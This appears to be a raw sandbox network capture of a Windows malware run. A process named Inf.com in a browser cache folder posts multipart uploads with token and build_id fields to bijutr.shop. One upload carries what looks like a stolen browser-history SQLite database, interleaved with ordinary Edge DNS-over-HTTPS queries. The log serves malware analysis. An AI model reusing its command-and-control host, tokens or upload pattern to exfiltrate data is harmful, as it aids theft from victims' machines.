                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                                  Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                                  Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                                  Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                                  Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                                  Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                                  Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49941 | 172.64.41.3 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49942 | 172.64.41.3 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49944 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:31 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FKFKXLNYM7GV37Q9ZCBA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 207993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:01:31 UTC | 16355 | OUT | Data Ascii:
------FKFKXLNYM7GV37Q9ZCBA
Content-Disposition: form-data; name="token"

a9d26c542187b1bd8ffa28120f0b3b8a
------FKFKXLNYM7GV37Q9ZCBA
Content-Disposition: form-data; name="build_id"

7860569445207f1198f3127a2e0d4a29
------FKFKXLNYM7GV37Q9ZCBA
Cont
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                  Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:01:33 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:01:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49940 | 162.159.61.3 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:32 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 10 6d 73 65 64 67 65 65 78 74 65 6e 73 69 6f 6e 73 02 73 66 03 74 6c 75 02 64 6c 08 64 65 6c 69 76 65 72 79 02 6d 70 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 2f 00 0c 00 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: msedgeextensionssftludldeliverympmicrosoftcomA)/+
2024-12-27 06:01:32 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 06:01:32 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f8718b91ab0436c-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:32 UTC468INData Raw: 00 00 81 80 00 01 00 04 00 01 00 01 10 6d 73 65 64 67 65 65 78 74 65 6e 73 69 6f 6e 73 02 73 66 03 74 6c 75 02 64 6c 08 64 65 6c 69 76 65 72 79 02 6d 70 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0e 10 00 34 04 73 74 61 72 02 73 66 03 74 6c 75 02 64 6c 08 64 65 6c 69 76 65 72 79 02 6d 70 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 08 64 65 6c 69 76 65 72 79 c0 33 c0 52 00 05 00 01 00 01 51 80 00 26 11 63 64 70 2d 66 2d 73 73 6c 2d 74 6c 75 2d 6e 65 74 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 92 00 05 00 01 00 00 01 2c 00 38 04 73 74 61 72 02 73 62 03 74 6c 75 02 64 6c 08 64 65 6c 69 76 65 72 79 02 6d 70 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 09 65 64 67 65 73 75 69 74 65 03 6e 65 74 00 c0 c4 00
                                                                                                                                                                                                                                                                                                  Data Ascii: msedgeextensionssftludldeliverympmicrosoftcomA4starsftludldeliverympmicrosoftcomdelivery3RQ&cdp-f-ssl-tlu-nettrafficmanagernet,8starsbtludldeliverympmicrosoftcomedgesuitenet


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49954 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:33 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Z5P8GDTJM7G4E3O8Q1DB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------Z5P8GDTJM7G4E3O8Q1DBCont
2024-12-27 06:01:34 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:34 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:01:34 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49964 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:35 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----0Z58G4WLNYCJE3OHVAS0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 262605
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:01:35 UTC | 16355 | OUT | Data Ascii:
------0Z58G4WLNYCJE3OHVAS0
Content-Disposition: form-data; name="token"

a9d26c542187b1bd8ffa28120f0b3b8a
------0Z58G4WLNYCJE3OHVAS0
Content-Disposition: form-data; name="build_id"

7860569445207f1198f3127a2e0d4a29
------0Z58G4WLNYCJE3OHVAS0
Cont
2024-12-27 06:01:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:37 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49972 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:36 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----L6XBI5FCBIEUAIEK6PPP
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 393697
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:01:36 UTC | 16355 | OUT | Data Ascii:
------L6XBI5FCBIEUAIEK6PPP
Content-Disposition: form-data; name="token"

a9d26c542187b1bd8ffa28120f0b3b8a
------L6XBI5FCBIEUAIEK6PPP
Content-Disposition: form-data; name="build_id"

7860569445207f1198f3127a2e0d4a29
------L6XBI5FCBIEUAIEK6PPP
Cont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
